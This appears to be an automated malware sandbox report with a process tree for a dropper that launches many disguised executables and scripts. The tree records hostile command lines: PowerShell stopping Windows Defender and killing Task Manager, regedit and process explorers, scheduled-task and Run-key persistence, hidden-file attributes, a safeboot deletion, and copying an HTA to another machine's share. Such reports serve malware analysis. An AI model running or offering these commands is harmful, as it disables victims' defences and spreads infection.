PID 3376 wrote to memory of 4364	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	85
PID 3376 wrote to memory of 4364	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	85
PID 3376 wrote to memory of 4364	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	85
PID 2288 wrote to memory of 1900	2288	FILE5.EXE	86
PID 2288 wrote to memory of 1900	2288	FILE5.EXE	86
PID 2288 wrote to memory of 1900	2288	FILE5.EXE	86
PID 3376 wrote to memory of 4700	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	87
PID 3376 wrote to memory of 4700	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	87
PID 3376 wrote to memory of 4700	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	87
PID 1872 wrote to memory of 6132	1872	WScript.exe	88
PID 1872 wrote to memory of 6132	1872	WScript.exe	88
PID 1872 wrote to memory of 6132	1872	WScript.exe	88
PID 2288 wrote to memory of 4728	2288	FILE5.EXE	89
PID 2288 wrote to memory of 4728	2288	FILE5.EXE	89
PID 2288 wrote to memory of 4728	2288	FILE5.EXE	89
PID 2288 wrote to memory of 5828	2288	FILE5.EXE	90
PID 2288 wrote to memory of 5828	2288	FILE5.EXE	90
PID 2288 wrote to memory of 5828	2288	FILE5.EXE	90
PID 3376 wrote to memory of 5832	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	91
PID 3376 wrote to memory of 5832	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	91
PID 3376 wrote to memory of 5832	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	91
PID 3376 wrote to memory of 4980	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	182
PID 3376 wrote to memory of 4980	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	182
PID 3376 wrote to memory of 4980	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	182
PID 4268 wrote to memory of 5916	4268	WScript.exe	94
PID 4268 wrote to memory of 5916	4268	WScript.exe	94
PID 4268 wrote to memory of 5916	4268	WScript.exe	94
PID 3376 wrote to memory of 5604	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	96
PID 3376 wrote to memory of 5604	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	96
PID 3376 wrote to memory of 5604	3376	9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe	96
PID 5924 wrote to memory of 5136	5924	WScript.exe	97
PID 5924 wrote to memory of 5136	5924	WScript.exe	97
PID 5924 wrote to memory of 5136	5924	WScript.exe	97
PID 4268 wrote to memory of 2952	4268	WScript.exe	103
PID 4268 wrote to memory of 2952	4268	WScript.exe	103
PID 4268 wrote to memory of 2952	4268	WScript.exe	103
PID 4268 wrote to memory of 4816	4268	WScript.exe	399
PID 4268 wrote to memory of 4816	4268	WScript.exe	399
PID 4268 wrote to memory of 4816	4268	WScript.exe	399
PID 4268 wrote to memory of 3576	4268	WScript.exe	109
PID 4268 wrote to memory of 3576	4268	WScript.exe	109
PID 4268 wrote to memory of 3576	4268	WScript.exe	109
PID 4700 wrote to memory of 416	4700	LEGIT_SOFTWARE2.EXE	111

Views/modifies file attributes 1 TTPs 5 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5668	attrib.exe
3584	attrib.exe
4048	attrib.exe
1720	attrib.exe
5528	attrib.exe

C:\Users\Admin\AppData\Local\Temp\9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe
"C:\Users\Admin\AppData\Local\Temp\9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3376
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EXECUTION.JS"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1872
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:6132
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:3812
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:4428
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4980
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1248
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1720
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3840
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:5380
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:6124
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:344
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:3480
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:3408
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:4596
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5904
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:2848
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:936
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:3896
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:4840
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:3128
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4752
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:5528
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:5364
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:5400
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:2980
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:4232
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:2324
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:872
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:6024
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta
    3⤵
    PID:2128
- C:\Users\Admin\AppData\Local\Temp\FILE5.EXE
  "C:\Users\Admin\AppData\Local\Temp\FILE5.EXE"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2288
- - C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE
    "C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5108
- - C:\Program Files (x86)\VLC1.EXE
    "C:\Program Files (x86)\VLC1.EXE"
    3⤵
    - Modifies WinLogon for persistence
    - Executes dropped EXE
    - Adds Run key to start application
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    PID:1900
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k attrib "C:\Program Files (x86)\VLC1.EXE" +s +h
      4⤵
      PID:2348
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Program Files (x86)\VLC1.EXE" +s +h
        5⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:4048
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k attrib "C:\Program Files (x86)" +s +h
      4⤵
      PID:1956
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Program Files (x86)" +s +h
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1720
  - - C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
      "C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3004
- - C:\Program Files (x86)\WINDOWS DEFENDER.EXE
    "C:\Program Files (x86)\WINDOWS DEFENDER.EXE"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4728
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:5056
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1628
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp95E7.tmp.bat""
      4⤵
      PID:5016
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:1532
    - - C:\Users\Admin\AppData\Roaming\csrss.exe
        
        "C:\Users\Admin\AppData\Roaming\csrss.exe"
        5⤵
        Executes dropped EXE
        
        PID:2600
- - C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE
    "C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    PID:5828
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FINDM10E.VBS"
  2⤵
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4268
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib +s +h C:\Windows\Temp\svchost_533423.exe
    3⤵
    PID:5916
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h C:\Windows\Temp\svchost_533423.exe
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:5668
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Service WinDefend -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2952
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name taskmgr.exe -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name cmd.exe -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3576
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name regedit.exe -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2536
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name procexp.exe -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1104
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name processhacker.exe -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5236
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c bcdedit /deletevalue {current} safeboot
    3⤵
    PID:6012
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power /v HiberbootEnabled /t REG_DWORD /d 0 /f
    3⤵
    PID:5096
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power /v HiberbootEnabled /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry key
      PID:4612
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c cipher /e /s:C:\Windows\Temp\
    3⤵
    PID:4584
  - - C:\Windows\SysWOW64\cipher.exe
      cipher /e /s:C:\Windows\Temp\
      4⤵
      PID:4516
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Local\findme_579518.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1820
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h C:\Users\Admin\AppData\Local\findme_579518.exe
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:5528
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /b C:\Users\Admin\AppData\Local\findme_579518.exe
    3⤵
    PID:5776
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INSTALLE10R.VBS"
  2⤵
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:5924
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib +s +h C:\Users\Public\Documents\winservice_533423.exe
    3⤵
    PID:5136
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h C:\Users\Public\Documents\winservice_533423.exe
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:3584
- C:\Users\Admin\AppData\Local\Temp\JOKE.EXE
  "C:\Users\Admin\AppData\Local\Temp\JOKE.EXE"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5908
- C:\Users\Admin\AppData\Local\Temp\JOKE2.EXE
  "C:\Users\Admin\AppData\Local\Temp\JOKE2.EXE"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1056
- C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE1.EXE
  "C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE1.EXE"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4364
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7AFC.tmp\7AFD.tmp\7AFE.bat C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE1.EXE"
    3⤵
    - Modifies registry class
    PID:5428
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msgbx.vbs"
      4⤵
      PID:2440
  - - C:\Windows\system32\net.exe
      net stop "WSearch"
      4⤵
      PID:5668
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WSearch"
        5⤵
        
        PID:784
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "START PAGE" /d "https://watchfurry4k.com"
      4⤵
      Modifies Internet Explorer settings
      PID:3164
- C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE2.EXE
  "C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE2.EXE"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4700
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7B1B.tmp\7B1C.tmp\7B1D.bat C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE2.EXE"
    3⤵
    PID:416
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2896
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2700
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1800
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4504
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:5756
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:5212
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4432
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:412
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:5512
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LOL.VBS"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5832
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sys32.hta \\BFFC-PC\C$\Users\Public\sys32.hta
    3⤵
    PID:1112
- C:\Users\Admin\AppData\Local\Temp\SENDE2R.EXE
  "C:\Users\Admin\AppData\Local\Temp\SENDE2R.EXE"
  2⤵
  - Executes dropped EXE
  PID:4980
- - C:\Windows\SysWOW64\config\Rundll32.exe
    "C:\Windows\system32\config\Rundll32.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    PID:2676
  - - C:\Windows\SysWOW64\config\Rundll32.exe
      "C:\Windows\system32\config\Rundll32.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      PID:5688
    - - C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4416
      - C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        6⤵
        Executes dropped EXE
        
        PID:2276
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        7⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:1708
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        8⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:2148
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        9⤵
        Executes dropped EXE
        
        PID:5268
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        10⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:4752
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        11⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:1720
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        12⤵
        Executes dropped EXE
        
        PID:2116
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        13⤵
        Executes dropped EXE
        
        PID:1520
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        14⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:2788
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        15⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:848
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        16⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5608
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        17⤵
        Executes dropped EXE
        
        PID:2468
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        18⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2632
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        19⤵
        Executes dropped EXE
        
        PID:2336
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        20⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4100
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        21⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5256
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        22⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:5584
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        23⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:4244
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        24⤵
        Executes dropped EXE
        
        PID:560
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        25⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:4676
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        26⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3028
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        27⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:1628
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        28⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2352
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        29⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:1764
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        30⤵
        Executes dropped EXE
        
        PID:5216
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        31⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:4516
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        32⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5656
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        33⤵
        Executes dropped EXE
        
        PID:1100
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        34⤵
        Executes dropped EXE
        
        PID:1292
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        35⤵
        Executes dropped EXE
        
        PID:4508
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        36⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:3348
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
